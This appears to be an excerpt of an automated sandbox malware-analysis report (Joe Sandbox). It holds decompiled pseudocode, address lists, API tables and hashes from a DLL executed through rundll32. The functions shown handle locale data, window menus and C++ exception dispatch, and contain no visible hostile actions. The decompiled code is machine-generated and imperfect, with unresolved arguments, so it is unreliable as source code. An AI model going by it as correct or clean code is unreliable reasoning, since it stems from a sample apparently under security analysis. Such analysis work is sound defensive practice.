				signed int _t146;
				signed int _t150;
				signed int _t154;
				signed int _t158;
				signed int _t162;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t182;
				signed int _t186;
				signed int _t190;
				char _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				void* _t225;
				char* _t227;
				signed int _t228;
				signed int _t232;
				signed int _t233;
				void* _t235;
				void* _t237;
				char* _t258;

				_t225 = __edx;
				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E10026850(1, 0x50);
					_v8 = _t235;
					E100268B3(0);
					if(_t235 != 0) {
						_t228 = E10026850(1, 4);
						_v12 = _t228;
						E100268B3(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0x1004d788, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E10026850(1, 4);
							_v16 = _t233;
							E100268B3(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t116 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x15, _t14);
								_t118 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x14, _v8 + 0x10);
								_t122 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x16, _v8 + 0x14);
								_t126 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t130 = E10037D5C(_t225,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x18, _v8 + 0x1c);
								_t134 = E10037D5C(_t225,  &_v28, 1, _t234, 0x50, _v8 + 0x20);
								_t138 = E10037D5C(_t225,  &_v28, 1, _t234, 0x51, _v8 + 0x24);
								_t142 = E10037D5C(_t225,  &_v28, 0, _t234, 0x1a, _v8 + 0x28);
								_t146 = E10037D5C(_t225,  &_v28, 0, _t234, 0x19, _v8 + 0x29);
								_t150 = E10037D5C(_t225,  &_v28, 0, _t234, 0x54, _v8 + 0x2a);
								_t154 = E10037D5C(_t225,  &_v28, 0, _t234, 0x55, _v8 + 0x2b);
								_t158 = E10037D5C(_t225,  &_v28, 0, _t234, 0x56, _v8 + 0x2c);
								_t162 = E10037D5C(_t225,  &_v28, 0, _t234, 0x57, _v8 + 0x2d);
								_t166 = E10037D5C(_t225,  &_v28, 0, _t234, 0x52, _v8 + 0x2e);
								_t170 = E10037D5C(_t225,  &_v28, 0, _t234, 0x53, _v8 + 0x2f);
								_t174 = E10037D5C(_t225,  &_v28, 2, _t234, 0x15, _v8 + 0x38);
								_t178 = E10037D5C(_t225,  &_v28, 2, _t234, 0x14, _v8 + 0x3c);
								_t182 = E10037D5C(_t225,  &_v28, 2, _t234, 0x16, _v8 + 0x40);
								_t186 = E10037D5C(_t225,  &_v28, 2, _t234, 0x17, _v8 + 0x44);
								_t190 = E10037D5C(_t225,  &_v28, 2, _t234, 0x50, _v8 + 0x48);
								if((E10037D5C(_t225,  &_v28, 2, _t234, 0x51, _v8 + 0x4c) | _t116 | _t118 | _t122 | _t126 | _t130 | _t134 | _t138 | _t142 | _t146 | _t150 | _t154 | _t158 | _t162 | _t166 | _t170 | _t174 | _t178 | _t182 | _t186 | _t190) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t196 =  *_t227;
										if(_t196 == 0) {
											break;
										}
										_t61 = _t196 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t196 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t222 =  *((intOrPtr*)(_t258 + 1));
												 *_t258 = _t222;
												_t258 = _t258 + 1;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E1002EC4B(_v8);
								E100268B3(_v8);
								E100268B3(_v12);
								E100268B3(_v16);
								goto L4;
							}
							E100268B3(_t235);
							E100268B3(_v12);
							L7:
							goto L4;
						}
						E100268B3(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x1004d788;
					L26:
					_t106 =  *(_t209 + 0x84);
					if(_t106 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t106 | 0xffffffff) == 0) {
							E100268B3( *(_t209 + 0x88));
							E100268B3( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

0x1002ed49
0x1002ed52
0x1002ed59
0x1002ed5c
0x1002ed5f
0x1002ed68
0x1002ed8a
0x1002ed8e
0x1002ed91
0x1002ed9b
0x1002edae
0x1002edb2
0x1002edb5
0x1002edbf
0x1002edd1
0x1002f063
0x1002f064
0x1002f066
0x1002f06e
0x1002f072
0x1002f077
0x1002f082
0x1002f08e
0x1002f09a
0x1002f0a6
0x1002f0ac
0x1002f0b0
0x1002f0b2
0x1002f0b2
0x00000000
0x1002f0b0
0x1002ede0
0x1002ede4
0x1002ede7
0x1002edf1
0x1002ee05
0x1002ee0b
0x1002ee18
0x1002ee2f
0x1002ee46
0x1002ee5d
0x1002ee6d
0x1002ee7a
0x1002ee91
0x1002eea8
0x1002eebf
0x1002eed9
0x1002eef0
0x1002ef07
0x1002ef1e
0x1002ef38
0x1002ef4f
0x1002ef66
0x1002ef7d
0x1002ef97
0x1002efae
0x1002efc5
0x1002efdc
0x1002f000
0x1002f02e
0x1002f03d
0x1002f03d
0x1002f041
0x00000000
0x00000000
0x1002f032
0x1002f032
0x1002f038
0x1002f047
0x1002f03c
0x1002f03c
0x00000000
0x1002f03c
0x1002f049
0x1002f04b
0x1002f04b
0x1002f04e
0x1002f050
0x1002f053
0x00000000
0x1002f057
0x1002f03a
0x00000000
0x1002f03a
0x00000000
0x1002f043
0x1002f006
0x1002f00c
0x1002f015
0x1002f01e
0x00000000
0x1002f023
0x1002edf4
0x1002edfd
0x1002edc7
0x00000000
0x1002edc7
0x1002edc2
0x00000000
0x1002edc2
0x1002ed9d
0x00000000
0x1002ed72
0x1002ed72
0x1002ed74
0x1002ed77
0x1002f0b4
0x1002f0b4
0x1002f0bc
0x1002f0be
0x1002f0be
0x1002f0c6
0x1002f0cb
0x1002f0cf
0x1002f0d7
0x1002f0df
0x1002f0e5
0x1002f0cf
0x1002f0e9
0x1002f0ee
0x1002f0f4
0x00000000
0x1002f0f4

APIs

_free.LIBCMT ref: 1002ED91
_free.LIBCMT ref: 1002EDB5
_free.LIBCMT ref: 1002EDC2
_free.LIBCMT ref: 1002EDE7
_free.LIBCMT ref: 1002EDF4
_free.LIBCMT ref: 1002EDFD
_free.LIBCMT ref: 1002F0D7
_free.LIBCMT ref: 1002F0DF

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ba1c2a6625fe5a2a64c27771cd4ec2b3e25c6bbf47b96f61401367316ab1897e
Instruction ID: 8ee7e6e7f1e9dc527fc3b3db97b70811b20268164f27ddc043a2abe035561a2d
Opcode Fuzzy Hash: ba1c2a6625fe5a2a64c27771cd4ec2b3e25c6bbf47b96f61401367316ab1897e
Instruction Fuzzy Hash: C5C14376D40205AFDB20CBA8DC82FEE77F8EF09750F554165FA09FB282D670A9458B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001AC4, Relevance: 18.1, APIs: 12, Instructions: 142
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10001AC4(void* __edx, struct HWND__* _a4, int _a8, unsigned int _a12, unsigned int _a16) {
				signed int _v8;
				struct tagRECT _v24;
				char _v25;
				unsigned int _v32;
				void* __ebp;
				signed int _t21;
				void* _t25;
				long _t29;
				void* _t31;
				void* _t44;
				void* _t51;
				void* _t52;
				struct HBRUSH__* _t55;
				struct HWND__* _t61;
				void* _t62;
				unsigned int _t67;
				struct HMENU__* _t68;
				struct HDC__* _t69;
				unsigned int _t70;
				signed int _t73;
				void* _t77;

				_t66 = __edx;
				_t21 =  *0x1004d054; // 0x944e5696
				_v8 = _t21 ^ _t73;
				_t61 = _a4;
				_t70 = _a16;
				_v32 = _t70;
				_t77 = _a8 - 0x111;
				if(_t77 > 0) {
					_t25 = _a8 - 0x200;
					if(_t25 == 0) {
						_t29 = E100015F8(_t62, _t61, _a12, _t70 & 0x0000ffff, _t70 >> 0x10);
						goto L21;
					} else {
						_t31 = _t25 - 1;
						if(_t31 == 0) {
							_t29 = E1000144D(_t62, __edx, _t61, _a12, _t70 & 0x0000ffff, _t70 >> 0x10);
							goto L21;
						} else {
							if(_t31 == 1) {
								_t29 = E100014BD(_t61, _a12, _t70 & 0x0000ffff, _t70 >> 0x10);
								L21:
							} else {
								goto L17;
							}
						}
					}
				} else {
					if(_t77 == 0) {
						L11:
						_t67 = _a12;
						_v25 = 1;
						_t29 = E1000134B(_t61, _t67 & 0x0000ffff, _t67 >> 0x10, _t70,  &_v25);
						if(_v25 == 0) {
							_push(_t70);
							_push(_t67);
							goto L13;
						}
					} else {
						_t44 = _a8 - 1;
						if(_t44 == 0) {
							_t68 = GetSubMenu(GetMenu(_t61), 1);
							CheckMenuRadioItem(_t68, 0xca, 0xcb, 0xca, 8);
							CheckMenuItem(_t68, 0xcc, 8);
							CheckMenuItem(_t68, 0xcd, 8);
							_t70 = _v32;
							goto L11;
						} else {
							_t51 = _t44 - 1;
							if(_t51 == 0) {
								PostQuitMessage(0);
								goto L7;
							} else {
								_t52 = _t51 - 0xd;
								if(_t52 == 0) {
									_t29 = E1000168B(_t61);
								} else {
									if(_t52 != 5) {
										L17:
										_push(_t70);
										_push(_a12);
										L13:
										_t29 = DefWindowProcA(_t61, _a8, ??, ??);
									} else {
										_t69 = GetDC(_t61);
										_t55 = GetClassLongA(_t61, 0xfffffff6);
										GetClientRect(_t61,  &_v24);
										FillRect(_t69,  &_v24, _t55);
										ReleaseDC(_t61, _t69);
										L7:
										_t29 = 0;
									}
								}
							}
						}
					}
				}
				return E100037EA(_t29, _v8 ^ _t73, _t66);
			}

0x10001ac4
0x10001aca
0x10001ad1
0x10001ad5
0x10001ade
0x10001ae2
0x10001ae5
0x10001ae8
0x10001bd9
0x10001bde
0x10001c28
0x00000000
0x10001be0
0x10001be0
0x10001be3
0x10001c13
0x00000000
0x10001be5
0x10001be8
0x10001bfe
0x10001c2d
0x00000000
0x00000000
0x00000000
0x10001be8
0x10001be3
0x10001aee
0x10001aee
0x10001ba3
0x10001ba3
0x10001bad
0x10001bba
0x10001bc6
0x10001bc8
0x10001bc9
0x00000000
0x10001bc9
0x10001af4
0x10001af7
0x10001afa
0x10001b71
0x10001b80
0x10001b94
0x10001b9e
0x10001ba0
0x00000000
0x10001afc
0x10001afc
0x10001aff
0x10001b57
0x00000000
0x10001b01
0x10001b01
0x10001b04
0x10001b4a
0x10001b06
0x10001b09
0x10001bea
0x10001bea
0x10001beb
0x10001bca
0x10001bce
0x10001b0f
0x10001b19
0x10001b1b
0x10001b28
0x10001b34
0x10001b3c
0x10001b42
0x10001b42
0x10001b42
0x10001b09
0x10001b04
0x10001aff
0x10001afa
0x10001aee
0x10001c3e

APIs

GetDC.USER32(?), ref: 10001B10
GetClassLongA.USER32(?,000000F6), ref: 10001B1B
GetClientRect.USER32 ref: 10001B28
FillRect.USER32(00000000,?,00000000), ref: 10001B34
ReleaseDC.USER32(?,00000000), ref: 10001B3C
PostQuitMessage.USER32 ref: 10001B57
GetMenu.USER32 ref: 10001B60
GetSubMenu.USER32 ref: 10001B69
CheckMenuRadioItem.USER32(00000000,000000CA,000000CB,000000CA,00000008), ref: 10001B80
CheckMenuItem.USER32 ref: 10001B94
CheckMenuItem.USER32 ref: 10001B9E
DefWindowProcA.USER32(?,?,?,?), ref: 10001BCE

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$CheckItem$Rect$ClassClientFillLongMessagePostProcQuitRadioReleaseWindow
String ID:
API String ID: 3289233142-0
Opcode ID: fe191d6ca87df1940fad0c56e3fec9642e8807648afcb1238b1305a9262ed2d6
Instruction ID: d4f665b8c9981696cb7546183abca082bb285263bca3685d46a9f30bb4881cd0
Opcode Fuzzy Hash: fe191d6ca87df1940fad0c56e3fec9642e8807648afcb1238b1305a9262ed2d6
Instruction Fuzzy Hash: 7241B2B2A40119BBF710DFB98E84EFF3BACEB05391F414505FA02E61A6D778D9109764

Uniqueness

Uniqueness Score: -1.00%

Function 1000134B, Relevance: 18.1, APIs: 12, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000134B(struct HWND__* _a4, int _a8, char* _a20) {
				signed int _v8;
				struct tagRECT _v24;
				struct HMENU__* _v28;
				void* __ebp;
				signed int _t12;
				char* _t14;
				struct HMENU__* _t19;
				void* _t25;
				struct HMENU__* _t29;
				struct HWND__* _t32;
				void* _t36;
				int _t37;
				RECT* _t38;
				signed int _t39;
				void* _t40;

				_t12 =  *0x1004d054; // 0x944e5696
				_v8 = _t12 ^ _t39;
				_t14 = _a20;
				_t32 = _a4;
				_t37 = _a8;
				_t40 = _t37 - 0xc9;
				if(_t40 == 0) {
					DestroyWindow(_t32);
					L15:
					return E100037EA(0, _v8 ^ _t39, _t36);
				}
				if(_t40 <= 0) {
					L13:
					 *_t14 = 0;
					goto L15;
				}
				if(_t37 <= 0xcb) {
					_t19 = GetSubMenu(GetMenu(_t32), 1);
					_t38 = 0;
					CheckMenuRadioItem(_t19, 0xca, 0xcb, _t37, 0);
					if(_t37 != 0xca) {
						GetClientRect(_t32,  &_v24);
						 *0x1004dbcc = CreateRectRgnIndirect( &_v24);
						goto L15;
					}
					_t25 =  *0x1004dbcc; // 0x0
					if(_t25 != 0) {
						DeleteObject(_t25);
						 *0x1004dbcc = 0;
					}
					L8:
					RedrawWindow(_t32, _t38, _t38, 0x105);
					goto L15;
				}
				if(_t37 > 0xcd) {
					goto L13;
				}
				_t29 = GetSubMenu(GetMenu(_t32), 1);
				_t38 = 0;
				_v28 = _t29;
				if((GetMenuState(_t29, _t37, 0) & 0x00000008) == 0) {
					_push(8);
				} else {
					_push(0);
				}
				CheckMenuItem(_v28, _t37, ??);
				goto L8;
			}

0x10001351
0x10001358
0x1000135b
0x10001364
0x10001369
0x1000136c
0x1000136e
0x10001436
0x1000143c
0x1000144c
0x1000144c
0x10001374
0x10001430
0x10001430
0x00000000
0x10001430
0x10001380
0x100013d9
0x100013df
0x100013ee
0x100013fa
0x10001419
0x10001429
0x00000000
0x10001429
0x100013fc
0x10001403
0x10001406
0x1000140c
0x1000140c
0x100013bf
0x100013c7
0x00000000
0x100013c7
0x10001388
0x00000000
0x00000000
0x10001398
0x1000139e
0x100013a0
0x100013ae
0x100013b3
0x100013b0
0x100013b0
0x100013b0
0x100013b9
0x00000000

APIs

GetMenu.USER32 ref: 1000138F
GetSubMenu.USER32 ref: 10001398
GetMenuState.USER32(00000000,?,00000000), ref: 100013A6
CheckMenuItem.USER32 ref: 100013B9
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 100013C7
GetMenu.USER32 ref: 100013D0
GetSubMenu.USER32 ref: 100013D9
CheckMenuRadioItem.USER32(00000000,000000CA,000000CB,?,00000000), ref: 100013EE
DeleteObject.GDI32(00000000), ref: 10001406
GetClientRect.USER32 ref: 10001419
CreateRectRgnIndirect.GDI32(?), ref: 10001423
DestroyWindow.USER32 ref: 10001436

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$CheckItemRectWindow$ClientCreateDeleteDestroyIndirectObjectRadioRedrawState
String ID:
API String ID: 2213066218-0
Opcode ID: a7e5d02df13b2adb80e4cd68cb86caf5d6b54ca8aeb4eb4cebfab569da949aeb
Instruction ID: 7486e58d24ad4b75999b07b7e2b9891a1c61c82330dbe42b58659f29cda41840
Opcode Fuzzy Hash: a7e5d02df13b2adb80e4cd68cb86caf5d6b54ca8aeb4eb4cebfab569da949aeb
Instruction Fuzzy Hash: F5215974A01225ABFB10DBA5CEC8E8F7BACEB16781F814015FA02E71A1C7749900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10005DB9, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E10005DB9(signed int __ecx, signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, char _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int* _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				void* _v72;
				char _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v104;
				void _v108;
				intOrPtr* _v116;
				signed char* _v188;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t203;
				void* _t204;
				signed int _t205;
				char _t206;
				signed int _t208;
				signed int _t210;
				signed char* _t211;
				signed int _t212;
				signed int _t213;
				signed int _t217;
				void* _t220;
				signed char* _t223;
				void* _t225;
				void* _t226;
				signed char _t230;
				signed int _t231;
				void* _t233;
				signed int _t234;
				void* _t237;
				void* _t240;
				signed char _t247;
				intOrPtr* _t252;
				void* _t255;
				signed int* _t257;
				signed int _t258;
				intOrPtr _t259;
				signed int _t260;
				void* _t265;
				void* _t270;
				void* _t271;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				intOrPtr _t298;
				signed int _t300;
				signed int _t303;
				signed char* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t308;
				signed char* _t311;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t333;
				void* _t335;
				void* _t337;
				void* _t338;
				void* _t339;
				void* _t340;

				_t303 = __edx;
				_t279 = __ecx;
				_push(_t322);
				_t308 = _a20;
				_v32 = 0;
				_v5 = 0;
				_t203 = E1000D9B3(_a8, _a16, _t308);
				_t338 = _t337 + 0xc;
				_v16 = _t203;
				if(_t203 < 0xffffffff || _t203 >= _t308[1]) {
					L69:
					_t204 = E10012120(_t274, _t279, _t303, _t322);
					asm("int3");
					_t335 = _t338;
					_t339 = _t338 - 0x38;
					_push(_t274);
					_t275 = _v116;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t204;
					} else {
						_push(_t322);
						_push(_t308);
						_t205 = E10005A3D(_t275, _t279, _t303, _t322);
						__eflags =  *(_t205 + 8);
						if( *(_t205 + 8) != 0) {
							__imp__EncodePointer(0);
							_t322 = _t205;
							_t225 = E10005A3D(_t275, _t279, _t303, _t322);
							__eflags =  *((intOrPtr*)(_t225 + 8)) - _t322;
							if( *((intOrPtr*)(_t225 + 8)) != _t322) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t217 = E10004D85(_t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t339 = _t339 + 0x1c;
										__eflags = _t217;
										if(_t217 != 0) {
											L86:
											return _t217;
										}
									}
								}
							}
						}
						_t206 = _a16;
						_v28 = _t206;
						_v24 = 0;
						__eflags =  *(_t206 + 0xc);
						if( *(_t206 + 0xc) > 0) {
							_push(_a24);
							E10004CB7(_t275, _t279, 0, _t322,  &_v44,  &_v28, _a20, _a12, _t206);
							_t305 = _v40;
							_t340 = _t339 + 0x18;
							_t217 = _v44;
							_v20 = _t217;
							_v12 = _t305;
							__eflags = _t305 - _v32;
							if(_t305 >= _v32) {
								goto L86;
							}
							_t281 = _t305 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t220 = memcpy( &_v64,  *((intOrPtr*)( *_t217 + 0x10)) + _t281, _t282 << 2);
								_t340 = _t340 + 0xc;
								__eflags = _v64 - _t220;
								if(_v64 > _t220) {
									goto L85;
								}
								__eflags = _t220 - _v60;
								if(_t220 > _v60) {
									goto L85;
								}
								_t223 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t223[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L83:
									__eflags =  *_t223 & 0x00000040;
									if(( *_t223 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E10005D39(_t305, _t275, _a4, _a8, _a12, _a16, _t223, 0,  &_v64, _a24, _a28);
										_t305 = _v12;
										_t340 = _t340 + 0x30;
									}
									goto L85;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L85;
								}
								goto L83;
								L85:
								_t305 = _t305 + 1;
								_t217 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t305;
								_v16 = _t281;
								__eflags = _t305 - _v32;
							} while (_t305 < _v32);
							goto L86;
						}
						E10012120(_t275, _t279, _t303, _t322);
						asm("int3");
						_push(_t335);
						_t304 = _v188;
						_push(_t275);
						_push(_t322);
						_push(0);
						_t208 = _t304[4];
						__eflags = _t208;
						if(_t208 == 0) {
							L111:
							_t210 = 1;
							__eflags = 1;
						} else {
							_t280 = _t208 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L111;
							} else {
								__eflags =  *_t304 & 0x00000080;
								_t311 = _v0;
								if(( *_t304 & 0x00000080) == 0) {
									L93:
									_t276 = _t311[4];
									_t324 = 0;
									__eflags = _t208 - _t276;
									if(_t208 == _t276) {
										L103:
										__eflags =  *_t311 & 0x00000002;
										if(( *_t311 & 0x00000002) == 0) {
											L105:
											_t211 = _a4;
											__eflags =  *_t211 & 0x00000001;
											if(( *_t211 & 0x00000001) == 0) {
												L107:
												__eflags =  *_t211 & 0x00000002;
												if(( *_t211 & 0x00000002) == 0) {
													L109:
													_t324 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t304 & 0x00000002;
													if(( *_t304 & 0x00000002) != 0) {
														goto L109;
													}
												}
											} else {
												__eflags =  *_t304 & 0x00000001;
												if(( *_t304 & 0x00000001) != 0) {
													goto L107;
												}
											}
										} else {
											__eflags =  *_t304 & 0x00000008;
											if(( *_t304 & 0x00000008) != 0) {
												goto L105;
											}
										}
										_t210 = _t324;
									} else {
										_t187 = _t276 + 8; // 0x6e
										_t212 = _t187;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t212;
											if(_t277 !=  *_t212) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L99:
												_t213 = _t324;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t212 + 1));
												if(_t278 !=  *((intOrPtr*)(_t212 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t212 = _t212 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L99;
													}
												}
											}
											L101:
											__eflags = _t213;
											if(_t213 == 0) {
												goto L103;
											} else {
												_t210 = 0;
											}
											goto L112;
										}
										asm("sbb eax, eax");
										_t213 = _t212 | 0x00000001;
										__eflags = _t213;
										goto L101;
									}
								} else {
									__eflags =  *_t311 & 0x00000010;
									if(( *_t311 & 0x00000010) != 0) {
										goto L111;
									} else {
										goto L93;
									}
								}
							}
						}
						L112:
						return _t210;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						_t322 = 0;
						__eflags = 0;
						goto L24;
					} else {
						_t322 = 0;
						if(_t274[0x1c] != 0) {
							L24:
							_t279 = _a12;
							_v12 = _t279;
							goto L26;
						} else {
							_t226 = E10005A3D(_t274, _t279, _t303, 0);
							if( *((intOrPtr*)(_t226 + 0x10)) == 0) {
								L63:
								return _t226;
							} else {
								_t274 =  *(E10005A3D(_t274, _t279, _t303, 0) + 0x10);
								_t265 = E10005A3D(_t274, _t279, _t303, 0);
								_v32 = 1;
								_v12 =  *((intOrPtr*)(_t265 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t322) {
									goto L69;
								} else {
									if( *((intOrPtr*)(E10005A3D(_t274, _t279, _t303, _t322) + 0x1c)) == _t322) {
										L25:
										_t279 = _v12;
										_t203 = _v16;
										L26:
										_v56 = _t308;
										_v52 = _t322;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L59:
											__eflags = _t308[3] - _t322;
											if(_t308[3] <= _t322) {
												goto L62;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L69;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t203);
													_push(_t308);
													_push(_a16);
													_push(_t279);
													_push(_a8);
													_push(_t274);
													L70();
													_t338 = _t338 + 0x20;
													goto L62;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L59;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L31:
													__eflags = _t308[3] - _t322;
													if(_t308[3] > _t322) {
														_push(_a28);
														E10004CB7(_t274, _t279, _t308, _t322,  &_v72,  &_v56, _t203, _a16, _t308);
														_t303 = _v68;
														_t338 = _t338 + 0x18;
														_t252 = _v72;
														_v48 = _t252;
														_v20 = _t303;
														__eflags = _t303 - _v60;
														if(_t303 < _v60) {
															_t294 = _t303 * 0x14;
															__eflags = _t294;
															_v36 = _t294;
															do {
																_t295 = 5;
																_t255 = memcpy( &_v108,  *((intOrPtr*)( *_t252 + 0x10)) + _t294, _t295 << 2);
																_t338 = _t338 + 0xc;
																__eflags = _v108 - _t255;
																if(_v108 <= _t255) {
																	__eflags = _t255 - _v104;
																	if(_t255 <= _v104) {
																		_t298 = 0;
																		_v24 = 0;
																		__eflags = _v96;
																		if(_v96 != 0) {
																			_t257 =  *(_t274[0x1c] + 0xc);
																			_t306 =  *_t257;
																			_t258 =  &(_t257[1]);
																			__eflags = _t258;
																			_v40 = _t258;
																			_t259 = _v92;
																			_v44 = _t306;
																			_v28 = _t259;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t321 = _v40;
																				_t333 = _t306;
																				__eflags = _t333;
																				if(_t333 <= 0) {
																					goto L42;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t260 =  &_v88;
																						_push( *_t321);
																						_push(_t260);
																						L89();
																						_t338 = _t338 + 0xc;
																						__eflags = _t260;
																						if(_t260 != 0) {
																							break;
																						}
																						_t333 = _t333 - 1;
																						_t321 = _t321 + 4;
																						__eflags = _t333;
																						if(_t333 > 0) {
																							continue;
																						} else {
																							_t298 = _v24;
																							_t259 = _v28;
																							_t306 = _v44;
																							goto L42;
																						}
																						goto L45;
																					}
																					_push(_a24);
																					_v5 = 1;
																					_push(_v32);
